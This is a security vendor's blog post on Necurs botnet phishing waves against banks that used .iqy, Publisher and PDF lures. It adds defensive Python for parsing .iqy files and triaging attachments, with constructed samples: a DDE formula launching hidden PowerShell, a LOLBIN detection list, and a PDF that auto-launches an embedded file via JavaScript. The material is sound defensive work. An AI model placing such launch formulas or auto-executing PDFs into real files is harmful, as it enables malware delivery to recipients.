Barkly vs Malware
Barkly Research
Aug 2018

Necurs Botnet Takes Aim at Banks with Targeted, Iterative Campaigns


More than 3,000 banks worldwide have been hit with a variety of experimental malware delivery techniques over the course of two weeks.

After staying relatively quiet for much of the year, Necurs, the world's largest spam botnet, has sprung back to life this summer. Most recently, researchers from Proofpoint and Cofense have independently observed the botnet launching large waves of malicious emails primarily targeting banks and other financial institutions.

What's particularly interesting about these campaigns is that they appear to employ a "fail fast" approach, with each wave experimenting with a variety of email lures and attachment types in an apparent attempt to see what sticks. In this post, we'll take a closer look at each of these tactics and provide tips for how organizations can protect themselves from them.


1st wave: August 10 — Experimenting with .iqy files

  • Attachment types: 
    • Microsoft Excel Web Query (.iqy) files
    • PDFs with embedded .iqy files
    • Password-protected ZIP archives containing .iqy files
    • Microsoft Word documents containing macros

  • Payload:
    • Marap (downloader)

Researchers at Proofpoint first observed Necurs launching large campaigns consisting of millions of malspam emails directed primarily at financial institutions on August 10. These campaigns utilized a total of four different attachment types, including not one, not two, but three different ways of leveraging Microsoft Excel Web Query (.iqy) files.

What makes .iqy files dangerous is that, despite being simple text files, they tell Excel (which opens them by default) to fetch content from a URL and import whatever comes back into the workbook, so they can be used to pull malicious commands straight from the Internet. Excel expert Jon Wittwer describes them as "basically like having a web browser built into Excel."


Contents of one of the .iqy files used in the August 10 campaigns. 


The use of .iqy files in attack campaigns is similar to the use of malicious macros embedded inside Microsoft Word documents. When a .iqy file is opened it launches Excel, which issues a warning prompt asking the user whether or not to enable data connections. If the user enables them, Excel pulls whatever the URL in the file returns (in these campaigns, a formula that launches a PowerShell command) into the worksheet.


Example of the user prompt issued when a .iqy file is opened. 

Thankfully, before Excel will actually run any command or script that the downloaded content tries to launch, the user has to click through a second prompt as well. Unfortunately, similar prompts haven't stopped users from enabling macros in suspicious documents, and there's little reason to expect this one to be a 100% effective deterrent, either.


Example of the second user prompt issued before executing any commands or scripts the .iqy file grabs. 
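As an added illustration (not part of the original post, and not code from Proofpoint, Cofense or Barkly), here is a small Python parser for the .iqy layout described above, together with a check for the DDE-style formula such a URL hands back, which is what stands behind the second prompt. The sample .iqy, its URL (a documentation-range address) and the fetched-text stand-in are constructed for the example and are not indicators from the campaigns:

```python
import re
from urllib.parse import urlparse

# Constructed sample .iqy file in the layout Excel expects for a web query:
# line 1 "WEB", line 2 the format version "1", line 3 the URL to fetch, then
# optional key=value settings. The address is a documentation-range
# placeholder, not an indicator from the campaigns.
SAMPLE_IQY = (
    "WEB\r\n"
    "1\r\n"
    "http://198.51.100.23/data.dat\r\n"
    "\r\n"
    "Selection=AllTables\r\n"
    "Formatting=None\r\n"
)

# Constructed stand-in for the text such a URL returns: a DDE formula. Excel
# evaluates an imported cell that begins with "=", and a "|" DDE link is what
# makes it ask whether to start another application (the second prompt).
SAMPLE_FETCHED = "=cmd|' /c powershell -w hidden -ep bypass -c \"...\"'!A0\r\n"

# =<server>|<topic>!<item> is the DDE link syntax; any imported cell shaped
# like this would try to launch an application.
DDE_LINK = re.compile(r"^\s*=\s*[A-Za-z0-9_.]+\s*\|.*!", re.MULTILINE)
LOLBINS = ("powershell", "cmd.exe", "mshta", "regsvr32", "certutil",
           "bitsadmin", "wscript", "cscript", "rundll32")


def parse_iqy(text):
    """Split a .iqy file into its URL and key=value settings; raise on bad layout."""
    lines = text.splitlines()
    if len(lines) < 3 or lines[0].strip().upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    params = {}
    for line in lines[3:]:
        if "=" in line:
            key, value = line.split("=", 1)
            params[key.strip()] = value.strip()
    return {"version": lines[1].strip(), "url": lines[2].strip(), "params": params}


def assess_iqy(text):
    """Decide whether a mailed .iqy should be blocked based on where it points."""
    query = parse_iqy(text)
    url = urlparse(query["url"])
    findings = []
    remote = url.scheme in ("http", "https", "ftp") or bool(url.hostname)
    if remote:
        findings.append(f"fetches remote content from {url.hostname}")
        if url.hostname and re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", url.hostname):
            findings.append("target is a bare IP address rather than a host name")
        # Policy from the post: a .iqy arriving by email has no business
        # pulling anything external, so any remote URL is enough to block.
        verdict = "block"
    else:
        findings.append("target is a local or UNC path; check where it leads")
        verdict = "review"
    return {"url": query["url"], "findings": findings, "verdict": verdict}


def assess_fetched(text):
    """Flag DDE launch formulas and tool names in content a .iqy pulled down."""
    findings = []
    if DDE_LINK.search(text):
        findings.append("DDE link formula (=app|topic!item) would start an application")
    lowered = text.lower()
    findings.extend(f"references {tool}" for tool in LOLBINS if tool in lowered)
    return findings


if __name__ == "__main__":
    print(assess_iqy(SAMPLE_IQY))
    print(assess_fetched(SAMPLE_FETCHED))
```

The two checks split the way the attack does: assess_iqy is what a mail gateway can decide from the attachment alone, while assess_fetched is the rule to run in a sandbox or over proxy captures once the URL has been fetched, since the .iqy file itself never contains the command.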


Necurs campaigns have been using .iqy files since late May, when security researcher @dvk01uk first spotted them being used to deploy FlawedAmmyy, a remote access trojan (RAT) developed from the leaked source code of the legitimate Ammyy Admin remote desktop software. 

In contrast, the August 10 campaigns tracked by Proofpoint were attempting to deploy Marap, a new malware downloader designed to hide out on infected machines with the goal of identifying systems of interest and launching future attacks. 

They also utilized five different email themes and attachment combinations:

Campaign variant #1: Fake sales request

  • Subject: REQUEST [REF:ABCDEXYZ]
  • From: sales <random@randomdomain.com>
  • Body: "Please find the attached file."
  • Attachment: REP_[date].iqy


Source: Proofpoint 


Campaign variant #2: "IMPORTANT Documents" message from major bank

  • Subject: IMPORTANT Documents - [name of major bank]
  • From: [recipient name] <random_name@[major bank].com>
  • Body: "Please check attached documents."
  • Attachment: [majorbank]_request_1008.iqy


Details identifying which major bank was being spoofed were obscured by Proofpoint. Source: Proofpoint 


Campaign variant #3: PDF attachments

  • Subject: SCN/DOC/PDF/PDFFILE_[random digits]_[campaign date]
  • From: [random name] <netadmin@[random domain]>
  • Body: "Please check attached documents."
  • Attachment: SCN/DOC/PDF/PDFFILE_[random digits]_[campaign date].pdf


This email is very similar to others used in previous Necurs campaigns utilizing .iqy files. Source: Proofpoint 

 

Campaign variant #4: Password-protected ZIP attachments

  • Subject: Emailing: PIC[random digits]
  • From: [random name] <[random name]@[random domain].com>
  • Body: "The message is ready to be sent with the following file or link attachments: [file] [password]"
  • Attachment: PIC[random digits].zip (contains .iqy file)


Source: Proofpoint 

 

Campaign variant #5: Fake Word document invoices

  • Subject: Invoice for [random digits].[date]
  • From: [random name] <[random name]@[random domain].com>
  • Body: "This email confirms that your goods have been dispatched. Please find attached your Invoice in PDF format. Please note this document will onlyl be sent in electronic form."
  • Attachment: Invoice_[random digits]_[date].doc


Email incorrectly says the attachment is a PDF when in fact it's a Word document. Source: Proofpoint 

2nd wave: August 15 — Shift to Microsoft Publisher files

  • Attachment types:
    • Microsoft Publisher (.pub) files
    • PDFs with embedded .iqy files

  • Payload: FlawedAmmyy (RAT)

Less than a week following Proofpoint's Necurs sighting, researchers at Cofense sounded the alarm on a new wave of emails targeting more than 3,700 bank domains. This time, the emails largely abandoned the use of .iqy files in favor of attaching Microsoft Publisher files with malicious macros embedded inside (though a small subset did continue using PDFs with embedded .iqy files). 

Microsoft Publisher isn't nearly as ubiquitous as Word or Excel, but its support of macros makes it just as useful from an attacker's perspective. Once enabled, the .pub file macros are designed to download the FlawedAmmyy payload from a URL and execute it without launching cmd.exe or PowerShell. 


Macro embedded inside Microsoft Publisher file. Source: Cofense 

 

Campaign example:

  • Subject: Payment Advice [random characters]
  • From: [random name]@[randomdomain].com
  • Body: "Please find the attached Payment advice for your claim number [matches random characters from the subject line]."
  • Attachment: Payment_Advice_[random characters].pub 


Source: Cofense 

3rd wave: August 21 — More experimentation with .pub files

  • Attachment types:
    • PDFs with embedded Microsoft Publisher (.pub) files

  • Payload: FlawedAmmyy (RAT)

Six days after their first sighting, Cofense reported another Necurs campaign targeting banks. This time the emails were disguised as payment notifications from South Africa's Capitec Bank, and rather than attaching Microsoft Publisher files directly, they carried PDF files with .pub files embedded inside. 

Opening the PDFs triggers JavaScript that attempts to automatically open the .pub file, and once opened, users are prompted to enable macros. From there, the infection is carried out via the same steps as in the previous campaign, with the macro ultimately downloading and executing the FlawedAmmyy payload. 

Campaign example:

  • Subject: Payment Notification
  • From: [random name]@capitecbank.co.za
  • Body: Blank with Capitec Bank footer
  • Attachment: payment_notification.pdf 


Source: Cofense 

Two accelerating attack trends putting organizations on the defensive

These latest campaigns from Necurs reflect two broad, dangerous trends:

  1. The widespread abuse of legitimate file types
    The use of .iqy and .pub files in these campaigns is yet another example of attackers latching onto legitimate file formats in order to slip past filters and carry out attacks using built-in Windows and Office functionality. Prior to these campaigns, Necurs was also responsible for distributing emails carrying PDFs with .SettingContent-ms files inside. More on how .SettingContent-ms files have been abused here. 

  2. The use of rapid iteration to fine-tune attacks and stay one step ahead of security
    This sudden burst of activity from Necurs is concerning in its own right, but it also highlights how quickly attackers are adopting and experimenting with new attack tactics. Necurs serves as the perfect testbed for that activity, making it easy for attackers to launch experimental campaigns on large groups of unwilling test subjects. The faster they can sort out what works and what doesn't, the quicker they can refine their techniques, and the more dangerous their attacks become. 

Security is already a cat-and-mouse game operating at breakneck speed. The ability of attackers to rapidly iterate means companies need to be ready for new types of attacks arriving at an even faster pace.

Find out how Barkly can help with machine learning models that are trained nightly and protection that evolves alongside attacks.

How to block attempts to abuse .iqy files

Abuse of .iqy files has been gradually gaining wider adoption since late May. Because they're a legitimate (and extremely simple) text format that carries no payload of its own, signature-based email and antivirus filters don't stand much chance of catching them on their own. To protect your organization, here's what you should do:

  • Block .iqy attachments at the email gateway, and extend the rule to .iqy files carried inside ZIP archives and PDFs, since both wrappers were used in these campaigns
  • If your organization doesn't actively use .iqy files, consider forcing them to open in Notepad instead of Excel via Group Policy Preferences:
    1. Open the Group Policy Management Console 
    2. Create a new Group Policy Object and name it something like "Block IQY Execution"
    3. Link the policy to the appropriate OUs (or the entire domain) and scope it with security groups as needed, then right-click the policy and click Edit
    4. Navigate to User Configuration > Preferences > Control Panel Settings > Folder Options
    5. Right-click in the blank area and choose New > Open With
    6. In the dialog, choose Update for the Action, enter iqy for the file extension, make sure Set as default is checked, and for the Associated Program field enter %windir%\System32\notepad.exe
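To make the gateway advice above checkable, here is an added Python example (not part of the original post and not Barkly's product code) that triages mail attachments the way these three waves would require: a flat block on the risky extensions, a look inside ZIP archives (standard ZIP encryption only protects entry contents, so the inner .iqy name is readable even when the archive is password-protected, as in campaign variant #4), and a raw-byte scan of PDFs for embedded files and the JavaScript the third wave used to open its .pub. The sample archive and PDF skeleton are constructed inline; the extension lists and indicator patterns are my assumptions, and a production gateway should parse the PDF object tree rather than grep bytes:

```python
import io
import re
import zipfile

# File types the post discusses: .iqy and .pub were the lures in these waves,
# .SettingContent-ms in earlier Necurs mail. A real gateway list is longer.
BLOCKED_EXT = {".iqy", ".pub", ".settingcontent-ms"}
# Formats that can carry macros and deserve a VBA scan rather than a flat block.
MACRO_EXT = {".doc", ".dot", ".xls", ".xlt", ".docm", ".xlsm", ".pptm"}

# Heuristic raw-byte indicators for PDFs (assumed patterns; dictionaries
# inside compressed object streams evade this scan, so parse properly in prod).
PDF_INDICATORS = {
    "embedded_file": re.compile(rb"/EmbeddedFile\b"),
    "javascript": re.compile(rb"/(?:JavaScript|JS)\b"),
    "open_action": re.compile(rb"/OpenAction\b"),
    "launch": re.compile(rb"/Launch\b"),
}
INNER_NAME = re.compile(rb"\.(?:iqy|pub|settingcontent-ms)\b", re.IGNORECASE)


def ext_of(name):
    """Lower-cased extension including the dot, or '' if there is none."""
    return "." + name.rsplit(".", 1)[1].lower() if "." in name else ""


def zip_members(data):
    """List (name, password_protected) for every entry. Standard ZIP encryption
    only protects entry contents, so names are readable without the password."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [(zi.filename, bool(zi.flag_bits & 0x1)) for zi in zf.infolist()]


def pdf_indicators(data):
    """Set of indicator names found in the raw PDF bytes."""
    hits = {name for name, rx in PDF_INDICATORS.items() if rx.search(data)}
    if INNER_NAME.search(data):
        hits.add("blocked_inner_name")
    return hits


def triage(filename, data):
    """Return (verdict, reasons) for one attachment: allow, review or block."""
    ext = ext_of(filename)
    if ext in BLOCKED_EXT:
        return "block", [f"{ext} attachments are blocked outright"]
    if ext == ".zip":
        try:
            members = zip_members(data)
        except zipfile.BadZipFile:
            return "review", ["archive could not be parsed"]
        reasons = [
            f"archive contains {name} ({'password-protected' if enc else 'not encrypted'})"
            for name, enc in members if ext_of(name) in BLOCKED_EXT
        ]
        return ("block", reasons) if reasons else ("allow", [])
    if ext == ".pdf":
        hits = pdf_indicators(data)
        if {"embedded_file", "blocked_inner_name"} <= hits:
            return "block", ["PDF embeds a blocked file type: " + ", ".join(sorted(hits))]
        if hits:
            return "review", ["PDF carries active content: " + ", ".join(sorted(hits))]
        return "allow", []
    if ext in MACRO_EXT:
        return "review", [f"{ext} can carry macros; scan for VBA before delivery"]
    return "allow", []


def _build_sample_zip():
    # Constructed: a plain (unencrypted) ZIP wrapping a .iqy, as in variant #4.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("REP_1008.iqy", "WEB\n1\nhttp://example.invalid/data.dat\n")
    return buf.getvalue()


SAMPLE_ZIP = _build_sample_zip()

# Constructed: a minimal PDF skeleton with an embedded .pub and an OpenAction
# that runs JavaScript to open it, the shape of the third-wave lure. Not a
# viewable PDF; only the dictionary keys matter to the scan.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Filespec /F (payment_notification.pub) /EF << /F 2 0 R >> >> endobj\n"
    b"2 0 obj << /Type /EmbeddedFile /Length 0 >> stream\nendstream endobj\n"
    b"3 0 obj << /Type /Catalog /OpenAction << /S /JavaScript "
    b"/JS (this.exportDataObject({cName: 'payment_notification.pub', nLaunch: 2});) >> >> endobj\n"
    b"%%EOF\n"
)

if __name__ == "__main__":
    for name, blob in [("REP_1008.iqy", b"WEB\n1\nhttp://example.invalid/x\n"),
                       ("PIC4711.zip", SAMPLE_ZIP),
                       ("payment_notification.pdf", SAMPLE_PDF),
                       ("Invoice_4711_0810.doc", b"\xd0\xcf\x11\xe0"),
                       ("minutes.txt", b"nothing to see")]:
        print(name, triage(name, blob))
```

The password-protected case is the one worth remembering: the gateway cannot extract or scan the .iqy inside such an archive, but it does not need to, because the entry name alone is enough to block on.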

Barkly customers: You're protected. Barkly blocks attempts to abuse .iqy files.


How to block attacks using macros in Microsoft Publisher files

For organizations that have taken steps to lock down Word or Excel but have neglected other Office programs like Publisher, here's another quick item for the to-do list. 

The good news is Microsoft ramped up its protections around macros in Office 2016, providing admins with more granular controls via Group Policy settings. You can read a full breakdown of those setting options along with helpful guidelines here. At a high level, Microsoft recommends the following settings:

Microsoft's recommended Group Policy settings for macros in Office 2016. Source: Microsoft 

Note: Here's the link to information about setting up trusted locations for files in Office 2016


Barkly customers: You're protected. Barkly blocks attempts to abuse macros in Office programs including Publisher.


By blocking malicious behavior patterns (in addition to malicious files), Barkly is able to provide more comprehensive protection that isn't reliant on the flawed AV approach. No more "patient zero" victims getting infected and protection being updated with new signatures after-the-fact. Just solid protection from malware and the underlying deployment techniques attackers rely on, which means Barkly blocks even new attack campaigns from day one. 

Want to see Barkly in action for yourself? Sign up to test it out.  

Want to stay up-to-date on the latest threats? Subscribe to the Barkly blog.

Barkly Research

Barkly's malware research team is hard at work stopping new malware that sneaks past antivirus.